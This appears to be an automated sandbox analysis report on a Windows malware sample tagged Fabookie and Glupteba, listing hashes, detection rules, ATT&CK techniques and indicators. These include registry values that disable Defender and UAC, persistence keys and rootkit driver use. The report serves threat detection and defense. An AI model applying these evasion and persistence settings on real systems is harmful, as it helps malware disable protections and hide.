fabookie | b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58

Analysis

max time kernel
296s
max time network
297s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
04-02-2024 03:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe
Size

938KB
MD5

668bbd74dce8327ef8c8f3db867bf0c5
SHA1

7f5dda62660a333031b76d96e227866ad16afc75
SHA256

b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58
SHA512

652cb1c90ab38ee5f5e07e413113c340f36c8990f50264e0b4bdb67513cef485c02554e9544dd76d86c6d763c6e16cb3d71cd77a6607eb528198622f7d796f04
SSDEEP

12288:XBHxXqjO+2Km0w36aqjMb5gjFyiHAoENT6PbBax7UqU3db98ySZXtW8EfNLPZTrN:RHxXwO+A/3U4MyXcwx7qtb9HSBQtPBp

Score

10^/10

fabookie glupteba discovery dropper evasion loader persistence rootkit spyware stealer trojan upx

Malware Config

Signatures

Detect Fabookie payload 2 IoCs

resource	yara_rule
behavioral1/memory/888-393-0x00000000033B0000-0x00000000034DC000-memory.dmp	family_fabookie
behavioral1/memory/888-405-0x00000000033B0000-0x00000000034DC000-memory.dmp	family_fabookie

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 32 IoCs

resource	yara_rule
behavioral1/memory/400-217-0x0000000002CA0000-0x000000000358B000-memory.dmp	family_glupteba
behavioral1/memory/400-241-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/3064-255-0x0000000002D00000-0x00000000035EB000-memory.dmp	family_glupteba
behavioral1/memory/3064-256-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/400-309-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/3064-354-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/400-377-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/400-384-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2080-395-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/3064-390-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/400-400-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1052-404-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2080-406-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1052-408-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2236-420-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2080-417-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1052-421-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2236-455-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2236-489-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2236-493-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2236-494-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2236-495-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2236-499-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2236-510-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2236-530-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2236-555-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2236-558-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2236-575-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2236-577-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2236-593-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2236-595-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2236-643-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe

Windows security bypass 2 TTPs 50 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\O9P9qO4Tj2MHoOpmI7ubFOQm.exe = "0"	O9P9qO4Tj2MHoOpmI7ubFOQm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IoHaAJhEDYhU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\uqeRQcQeSVSWnHVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IoHaAJhEDYhU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RZfGRCgJsrDIEOco = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FohpjzYDshfCC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hgFvgKbJayUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FohpjzYDshfCC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hgFvgKbJayUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\uqeRQcQeSVSWnHVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\wRnukjaj5Om8QYF5cIvTLrkH.exe = "0"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KCGdmeQdU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RZfGRCgJsrDIEOco = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe = "0"	b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RZfGRCgJsrDIEOco = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KCGdmeQdU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RZfGRCgJsrDIEOco = "0"	reg.exe

Modifies boot configuration data using bcdedit 14 IoCs

pid	Process
3004	bcdedit.exe
2964	bcdedit.exe
568	bcdedit.exe
1732	bcdedit.exe
1320	bcdedit.exe
1116	bcdedit.exe
1804	bcdedit.exe
2420	bcdedit.exe
2044	bcdedit.exe
1828	bcdedit.exe
1520	bcdedit.exe
2428	bcdedit.exe
1860	bcdedit.exe
2500	bcdedit.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
93	2776	rundll32.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2892	netsh.exe
2584	netsh.exe

Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Control Panel\International\Geo\Nation	fzzBiVW.exe

Drops startup file 8 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xjTw9wcEqfwSqAYXihi8yRk2.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c5ITKuFR2GJjtRpgtHmxJjj0.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wXbr6lB0N86hw6XW4TFc6bvS.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qWEAaIbJdpJZ7xQ2cwvnkP7r.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MuJmvwOsxIOfNTypQ0SK3AaK.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KqB6P9FAtmUZpOCX1Axp03E4.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ddvc1JAURNRtbXG4UP8CC2i8.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0f5WF9Up1CRL5y4H33ew5vFn.bat	CasPol.exe

Executes dropped EXE 20 IoCs

pid	Process
400	O9P9qO4Tj2MHoOpmI7ubFOQm.exe
1548	5LNKR5e8PgfkJD6U3XC43l49.exe
3064	wRnukjaj5Om8QYF5cIvTLrkH.exe
888	oOxhbuRZToEZjtYcGpxjn9Wu.exe
2976	Derdc26BaZmmO2FnzfGzxwll.exe
1616	3SQC3UNhscLbuWUPVbn7zCER.exe
1340	Derdc26BaZmmO2FnzfGzxwll.tmp
884	DEENLxL2jKdw406uQjofG0v6.exe
1716	Install.exe
1532	Install.exe
2080	wRnukjaj5Om8QYF5cIvTLrkH.exe
1052	O9P9qO4Tj2MHoOpmI7ubFOQm.exe
2236	csrss.exe
1836	patch.exe
748	injector.exe
2648	dsefix.exe
2052	windefender.exe
2880	windefender.exe
2788	BpHuwsu.exe
2520	fzzBiVW.exe

Loads dropped DLL 41 IoCs

pid	Process
2772	CasPol.exe
2772	CasPol.exe
2772	CasPol.exe
2772	CasPol.exe
2772	CasPol.exe
2772	CasPol.exe
1548	5LNKR5e8PgfkJD6U3XC43l49.exe
1548	5LNKR5e8PgfkJD6U3XC43l49.exe
2772	CasPol.exe
2772	CasPol.exe
2772	CasPol.exe
2976	Derdc26BaZmmO2FnzfGzxwll.exe
2772	CasPol.exe
884	DEENLxL2jKdw406uQjofG0v6.exe
884	DEENLxL2jKdw406uQjofG0v6.exe
884	DEENLxL2jKdw406uQjofG0v6.exe
884	DEENLxL2jKdw406uQjofG0v6.exe
1716	Install.exe
1716	Install.exe
1716	Install.exe
1716	Install.exe
1532	Install.exe
1532	Install.exe
1532	Install.exe
2080	wRnukjaj5Om8QYF5cIvTLrkH.exe
2080	wRnukjaj5Om8QYF5cIvTLrkH.exe
836	Process not Found
1836	patch.exe
1836	patch.exe
2236	csrss.exe
1836	patch.exe
1836	patch.exe
1836	patch.exe
1836	patch.exe
1836	patch.exe
1836	patch.exe
2236	csrss.exe
2776	rundll32.exe
2776	rundll32.exe
2776	rundll32.exe
2776	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000016d3d-214.dat	upx
behavioral1/memory/1548-225-0x0000000001190000-0x0000000001678000-memory.dmp	upx
behavioral1/memory/1548-320-0x0000000001190000-0x0000000001678000-memory.dmp	upx
behavioral1/memory/1548-388-0x0000000001190000-0x0000000001678000-memory.dmp	upx
behavioral1/memory/2052-533-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/2880-534-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/2052-535-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/2880-556-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/2880-576-0x0000000000400000-0x00000000008DF000-memory.dmp	upx

Windows security modification 2 TTPs 11 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\wRnukjaj5Om8QYF5cIvTLrkH.exe = "0"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\O9P9qO4Tj2MHoOpmI7ubFOQm.exe = "0"	O9P9qO4Tj2MHoOpmI7ubFOQm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions	b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe = "0"	b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	wRnukjaj5Om8QYF5cIvTLrkH.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	O9P9qO4Tj2MHoOpmI7ubFOQm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast	Install.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe

Drops Chrome extension 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	fzzBiVW.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	fzzBiVW.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
6	pastebin.com
4	pastebin.com

Manipulates WinMon driver. 1 IoCs

Roottkits write to WinMon to hide PIDs from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMon	csrss.exe

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 21 IoCs

description	ioc	Process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	fzzBiVW.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	fzzBiVW.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	rundll32.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	BpHuwsu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	fzzBiVW.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	fzzBiVW.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_5715DE550AA680C2FBA40D3A4F6608E9	fzzBiVW.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_8CFD0F060456F65ABC9E95E41A1F781C	fzzBiVW.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_D50E9269859FFB5A738F673D82E63752	fzzBiVW.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_5715DE550AA680C2FBA40D3A4F6608E9	fzzBiVW.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_8CFD0F060456F65ABC9E95E41A1F781C	fzzBiVW.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_D50E9269859FFB5A738F673D82E63752	fzzBiVW.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	BpHuwsu.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	BpHuwsu.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	fzzBiVW.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	fzzBiVW.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2448 set thread context of 2772	2448	b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe	30

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	wRnukjaj5Om8QYF5cIvTLrkH.exe
File opened (read-only)	\??\VBoxMiniRdrDN	O9P9qO4Tj2MHoOpmI7ubFOQm.exe

Drops file in Program Files directory 13 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\hgFvgKbJayUn\knlVbbd.dll	fzzBiVW.exe
